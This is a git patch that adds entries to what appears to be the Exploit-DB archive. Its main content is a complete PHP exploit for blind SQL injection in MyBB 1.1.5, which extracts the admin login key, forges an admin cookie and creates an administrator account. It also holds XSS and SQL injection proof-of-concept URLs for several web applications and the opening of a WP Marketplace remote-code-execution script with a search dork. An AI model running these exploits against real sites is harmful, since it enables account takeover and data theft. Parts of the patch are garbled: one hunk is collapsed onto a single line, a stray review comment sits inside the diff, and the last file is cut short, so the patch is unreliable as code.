From 3ab5d7365aa7957e46b11d811ac9119a7ff679be Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 26 Mar 2015 08:36:05 +0000
Subject: [PATCH] DB: 2015-03-26 11 new exploits
---
files.csv | 13 +-
platforms/php/webapps/2012.php | 652 ++++++++++++++---------
platforms/php/webapps/36481.txt | 9 +
platforms/php/webapps/36482.txt | 9 +
platforms/php/webapps/36483.txt | 7 +
platforms/php/webapps/36484.txt | 7 +
platforms/php/webapps/36485.txt | 9 +
platforms/php/webapps/36486.txt | 11 +
platforms/php/webapps/36487.txt | 7 +
platforms/php/webapps/36488.txt | 9 +
platforms/php/webapps/36489.txt | 25 ++
platforms/php/webapps/36490.py | 183 ++++
platforms/windows/remote/36491.txt | 11 +
13 files changed, 625 insertions(+), 327 deletions(-)
create mode 100755 platforms/php/webapps/36481.txt
create mode 100755 platforms/php/webapps/36482.txt
create mode 100755 platforms/php/webapps/36483.txt
create mode 100755 platforms/php/webapps/36484.txt
create mode 100755 platforms/php/webapps/36485.txt
create mode 100755 platforms/php/webapps/36486.txt
create mode 100755 platforms/php/webapps/36487.txt
create mode 100755 platforms/php/webapps/36488.txt
create mode 100755 platforms/php/webapps/36489.txt
create mode 100755 platforms/php/webapps/36490.py
create mode 100755 platforms/windows/remote/36491.txt
diff --git a/files.csv b/files.csv
index 8e000694c..71ece6da2 100755
--- a/files.csv
+++ b/files.csv
@@ -1717,7 +1717,7 @@ id,file,description,date,author,platform,type,port
 2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability",2006-07-13,SHiKaA,php,webapps,0
 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
 2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
-2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
+2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
 2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
@@ -32898,3 +32898,14 @@ id,file,description,date,author,platform,type,port
 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0
 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0
 36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0
+36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0
+36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0
+36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0
+36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0
+36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting Vulnerability",2012-01-02,sonyy,php,webapps,0
+36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection Vulnerability",2012-01-03,"Arturo Zamora",php,webapps,0
+36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0
+36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0
+36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
+36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add 
WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
+36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
diff --git a/platforms/php/webapps/2012.php b/platforms/php/webapps/2012.php
index adf2988f8..d36e53083 100755
--- a/platforms/php/webapps/2012.php
+++ b/platforms/php/webapps/2012.php
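Review bot: The date on the new `36484` row is `2011-01-01`, which sits between neighbours dated `2012-01-01` and `2012-01-02` in BID order (51220, 51221, 51227), so it is presumably a typo for `2012-01-01`; the advisory body added for it in this commit carries no date that would confirm either value. The `36488` description reads `WHOIS Plugin 1.4.2 3` while the matching `36488.txt` in the same commit says `WHOIS 1.4.2.3`; the index should agree with the advisory, e.g. `36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2.3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0`. The `36490` description appears to contain a line break inside the quoted field (`(Add` / `WP Admin)`); if that break is in the file rather than an artifact of rendering, CSV consumers that do not handle multi-line quoted fields will misparse every row after it.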
@@ -1,326 +1,326 @@ -#!/usr/bin/php -q -d short_open_tag=on -ipaddress = $ipaddress = getip(); - - // - // User-agent - // - $this->useragent = $_SERVER['HTTP_USER_AGENT']; - if(strlen($this->useragent) > 100) - { - $this->useragent = substr($this->useragent, 0, 100); - } - - // - // Attempt to find a session id in the cookies - // - if($_COOKIE['sid']) - { - $this->sid = addslashes($_COOKIE['sid']); - } - else - { - $this->sid = 0; - } - - // - // Attempt to load the session from the database - // - $query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'"); -... - -injection is blind, but you can ask true-false questions to the database to -retrieve the admin loginkey. -Through that you can build an admin cookie and create a new admin user through -the admin/users.php script. -Also you can disclose table prefix. - --------------------------------------------------------------------------------- - - --*****************************************************************************- -* * -* Italia - Germania 2-0, al 114' forse il pił bel gol che abbia mai visto * -* grazie Grosso! 
* -* * --*****************************************************************************- - */ - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - return (float) $sec + ((float) $usec * 100000); -} -srand(make_seed()); -$anumber = rand(1,99999); - -$host=$argv[1]; -$path=$argv[2]; -$port=80; -$prefix="mybb_"; -$user_id="1";//admin -$proxy=""; -$dt=0; -for ($i=3; $i<$argc; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -if ($temp=="-T") -{ - $prefix=str_replace("-T","",$argv[$i]); -} -if ($temp=="-u") -{ - $user_id=str_replace("-u","",$argv[$i]); -} -if ($temp=="-d") -{ - $dt=1; -} -} -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - -if ($dt) -{ -$sql="'suntzuuuu/*"; -echo "sql -> ".$sql."\r\n"; -$packet ="GET ".$p."index.php HTTP/1.0\r\n"; -$packet.="CLIENT-IP: $sql\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (eregi("You have an error in your SQL syntax",$html)) -{ - $temp=explode("sessions",$html); - $temp2=explode(" ",$temp[0]); - $prefix=$temp2[count($temp2)-1]; - echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n"; -} -else -{ -echo "unable to disclose table prefix...\n"; -} -sleep(1); -} - -$chars[0]=0;//null -$chars=array_merge($chars,range(48,57)); //numbers -$chars=array_merge($chars,range(65,90));//A-Z letters -$chars=array_merge($chars,range(97,122));//a-f letters -$j=1; -$loginkey=""; -while (!strstr($loginkey,chr(0))) -{ -for ($i=0; $i<=255; $i++) -{ -if (in_array($i,$chars)) -{ -$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*"; -echo "sql -> ".$sql."\r\n"; -$packet ="GET ".$p."index.php HTTP/1.0\r\n"; -$packet.="CLIENT-IP: $sql\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;} -} -if ($i==255) {die("Exploit failed...");} -} - $j++; -} -$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";"; -echo "admin cookie -> ".$cookie."\r\n"; - - -$data='-----------------------------7d62702f250530 -Content-Disposition: form-data; name="action"; - -do_add ------------------------------7d62702f250530 -Content-Disposition: form-data; name="userusername"; - -suntzu'.$anumber.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="newpassword"; - -suntzu'.$anumber.' 
------------------------------7d62702f250530 -Content-Disposition: form-data; name="email"; - -suntzoi@suntzu.org ------------------------------7d62702f250530 -Content-Disposition: form-data; name="usergroup"; - -4 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="additionalgroups[]"; - -4 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="displaygroup"; - -4 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="Add User"; - - Add User ------------------------------7d62702f250530-- -'; - -$packet="POST ".$p."admin/users.php HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Cookie: ".$cookie."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (eregi("The user has successfully been added",$html)) -{ - echo "exploit succeeded... now login as admin\n"; - echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n"; -} -else -{ - echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n"; -} -?> - -# milw0rm.com [2006-07-15] +#!/usr/bin/php -q -d short_open_tag=on +ipaddress = $ipaddress = getip(); + + // + // User-agent + // + $this->useragent = $_SERVER['HTTP_USER_AGENT']; + if(strlen($this->useragent) > 100) + { + $this->useragent = substr($this->useragent, 0, 100); + } + + // + // Attempt to find a session id in the cookies + // + if($_COOKIE['sid']) + { + $this->sid = addslashes($_COOKIE['sid']); + } + else + { + $this->sid = 0; + } + + // + // Attempt to load the session from the database + // + $query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'"); +... 
+ +injection is blind, but you can ask true-false questions to the database to +retrieve the admin loginkey. +Through that you can build an admin cookie and create a new admin user through +the admin/users.php script. +Also you can disclose table prefix. + +-------------------------------------------------------------------------------- + + +-*****************************************************************************- +* * +* Italia - Germania 2-0, al 114' forse il pił bel gol che abbia mai visto * +* grazie Grosso! * +* * +-*****************************************************************************- + */ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} +srand(make_seed()); +$anumber = rand(1,99999); + +$host=$argv[1]; +$path=$argv[2]; +$port=80; +$prefix="mybb_"; +$user_id="1";//admin +$proxy=""; +$dt=0; +for ($i=3; $i<$argc; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +if ($temp=="-T") +{ + $prefix=str_replace("-T","",$argv[$i]); +} +if ($temp=="-u") +{ + $user_id=str_replace("-u","",$argv[$i]); +} +if ($temp=="-d") +{ + $dt=1; +} +} +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +if ($dt) +{ +$sql="'suntzuuuu/*"; +echo "sql -> ".$sql."\r\n"; +$packet ="GET ".$p."index.php HTTP/1.0\r\n"; +$packet.="CLIENT-IP: $sql\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (eregi("You have an error in your SQL syntax",$html)) +{ + $temp=explode("sessions",$html); + $temp2=explode(" ",$temp[0]); + $prefix=$temp2[count($temp2)-1]; + echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n"; +} +else +{ +echo "unable to disclose table prefix...\n"; +} +sleep(1); +} + +$chars[0]=0;//null +$chars=array_merge($chars,range(48,57)); //numbers +$chars=array_merge($chars,range(65,90));//A-Z letters +$chars=array_merge($chars,range(97,122));//a-f letters +$j=1; +$loginkey=""; +while (!strstr($loginkey,chr(0))) +{ +for ($i=0; $i<=255; $i++) +{ +if (in_array($i,$chars)) +{ +$sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*"; +echo "sql -> ".$sql."\r\n"; +$packet ="GET ".$p."index.php HTTP/1.0\r\n"; +$packet.="CLIENT-IP: $sql\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +sendpacketii($packet); +if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;} +} +if ($i==255) {die("Exploit failed...");} +} + $j++; +} +$cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";"; +echo "admin cookie -> ".$cookie."\r\n"; + + +$data='-----------------------------7d62702f250530 +Content-Disposition: form-data; name="action"; + +do_add +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="userusername"; + +suntzu'.$anumber.' +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="newpassword"; + +suntzu'.$anumber.' 
+-----------------------------7d62702f250530 +Content-Disposition: form-data; name="email"; + +suntzoi@suntzu.org +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="usergroup"; + +4 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="additionalgroups[]"; + +4 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="displaygroup"; + +4 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="Add User"; + + Add User +-----------------------------7d62702f250530-- +'; + +$packet="POST ".$p."admin/users.php HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Cookie: ".$cookie."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (eregi("The user has successfully been added",$html)) +{ + echo "exploit succeeded... now login as admin\n"; + echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n"; +} +else +{ + echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n"; +} +?> + +# milw0rm.com [2006-07-15] diff --git a/platforms/php/webapps/36481.txt b/platforms/php/webapps/36481.txt new file mode 100755 index 000000000..123807b6e --- /dev/null +++ b/platforms/php/webapps/36481.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51216/info
+
+The TheCartPress WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TheCartPress WordPress Plugin 1.6 and prior versions are vulnerable.
+
+http://www.example.com/wp-content/plugins/thecartpress/admin/OptionsPostsList.php?tcp_options_posts_update=sdf&tcp_name_post_234=%3Cimg%20src=[XSS]&tcp_post_ids[]=234
\ No newline at end of file
diff --git a/platforms/php/webapps/36482.txt b/platforms/php/webapps/36482.txt
new file mode 100755
index 000000000..b950f4f4a
--- /dev/null
+++ b/platforms/php/webapps/36482.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51218/info
+
+Siena CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Siena CMS 1.242 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?err=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/36483.txt b/platforms/php/webapps/36483.txt
new file mode 100755
index 000000000..0f371128b
--- /dev/null
+++ b/platforms/php/webapps/36483.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51220/info
+
+WP Live.php plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[path]/wp-content/plugins/wp-livephp/wp-live.php?s=[Xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/36484.txt b/platforms/php/webapps/36484.txt
new file mode 100755
index 000000000..3fe15e601
--- /dev/null
+++ b/platforms/php/webapps/36484.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51221/info
+
+PHPB2B is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[patch]/list.php?do=search&q=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/36485.txt b/platforms/php/webapps/36485.txt
new file mode 100755
index 000000000..44fa44dcc
--- /dev/null
+++ b/platforms/php/webapps/36485.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51227/info
+
+FuseTalk Forums is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FuseTalk Forums 3.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/login.cfm?windowed=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/36486.txt b/platforms/php/webapps/36486.txt
new file mode 100755
index 000000000..2ea17ec4e
--- /dev/null
+++ b/platforms/php/webapps/36486.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/51240/info
+
+Tienda Virtual is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+The following example URIs are available:
+
+http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--
+
+http://www.example.com/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
\ No newline at end of file
diff --git a/platforms/php/webapps/36487.txt b/platforms/php/webapps/36487.txt
new file mode 100755
index 000000000..479b45307
--- /dev/null
+++ b/platforms/php/webapps/36487.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51241/info
+
+The Comment Rating plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker could leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=&imgIndex=
\ No newline at end of file
diff --git a/platforms/php/webapps/36488.txt b/platforms/php/webapps/36488.txt
new file mode 100755
index 000000000..50e6e196b
--- /dev/null
+++ b/platforms/php/webapps/36488.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51244/info
+
+WHOIS for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WHOIS 1.4.2.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/wp-content/plugins/wp-whois/wp-whois-ajax.php?cmd=wpwhoisform&ms=Xss?domain=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/36489.txt b/platforms/php/webapps/36489.txt
new file mode 100755
index 000000000..c89571b4c
--- /dev/null
+++ b/platforms/php/webapps/36489.txt
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/51254/info
+
+TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+TextPattern 4.4.1 is vulnerable; other versions may also be affected.
+
+POST /textpattern/setup/index.php HTTP/1.1
+
+Host: A.B.C.D
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
+Gecko/20100101 Firefox/8.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/textpattern/setup/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 156
+
+duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
+Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
+Config
\ No newline at end of file
diff --git a/platforms/php/webapps/36490.py b/platforms/php/webapps/36490.py
new file mode 100755
index 000000000..8c5ace501
--- /dev/null
+++ b/platforms/php/webapps/36490.py
@@ -0,0 +1,183 @@
+#!/usr/bin/python
+#
+# Exploit Name: WP Marketplace 2.4.0 Remote Command Execution
+#
+# Vulnerability discovered by Kacper Szurek (http://security.szurek.pl)
+#
+# Exploit written by Claudio Viviani
+#
+#
+#
+# --------------------------------------------------------------------
+#
+# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
+#
+# function ajaxinit(){
+# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
+# if(function_exists($_POST['execute']))
+# call_user_func($_POST['execute'],$_POST);
+# else
+# echo __("function not defined!","wpmarketplace");
+# die();
+# }
+#}
+#
+# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
+# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
+#
+# if (function_exists($_POST['execute']))
+# call_user_func($_POST['execute'], $_POST);
+# else
+# ...
+# ...
+# ...
+#
+# $_POST data needs to be an array
+#
+#
+# The wordpress function wp_insert_user is perfect:
+#
+# http://codex.wordpress.org/Function_Reference/wp_insert_user
+#
+# Description
+#
+# Insert a user into the database.
+#
+# Usage
+#
+#
+#
+# Parameters
+#
+# $userdata
+# (mixed) (required) An array of user data, stdClass or WP_User object. 
+# Default: None
+#
+#
+#
+# Evil POST Data (Add new Wordpress Administrator):
+#
+# action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
+#
+# ---------------------------------------------------------------------
+#
+# Dork google: index of "wpmarketplace"
+#
+# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
+#
+# Http connection
+import urllib, urllib2, socket
+#
+import sys
+# String manipulator
+import string, random
+# Args management
+import optparse
+
+# Check url
+def checkurl(url):
+ if url[:8] != "https://" and url[:7] != "http://":
+ print('[X] You must insert http:// or https:// procotol')
+ sys.exit(1)
+ else:
+ return url
+
+# Check if file exists and has readable
+def checkfile(file):
+ if not os.path.isfile(file) and not os.access(file, os.R_OK):
+ print '[X] '+file+' file is missing or not readable'
+ sys.exit(1)
+ else:
+ return file
+
+def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
+ return ''.join(random.choice(chars) for _ in range(size))
+
+banner = """
+ ___ ___ __
+ | Y .-----.----.--| .-----.----.-----.-----.-----.
+ |. | | _ | _| _ | _ | _| -__|__ --|__ --|
+ |. / \ |_____|__| |_____| __|__| |_____|_____|_____|
+ |: | |__|
+ |::.|:. |
+ `--- ---'
+ ___ ___ __ __ __
+ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----.
+ |. | _ | _| <| -__| _| _ | | _ | __| -__|
+ |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
+ |: | | |__|
+ |::.|:. 
|
+ `--- ---'
+ WP Marketplace
+ R3m0t3 C0d3 Ex3cut10n
+ (Add WP Admin)
+ v2.4.0
+
+ Written by:
+
+ Claudio Viviani
+
+ http://www.homelab.it
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
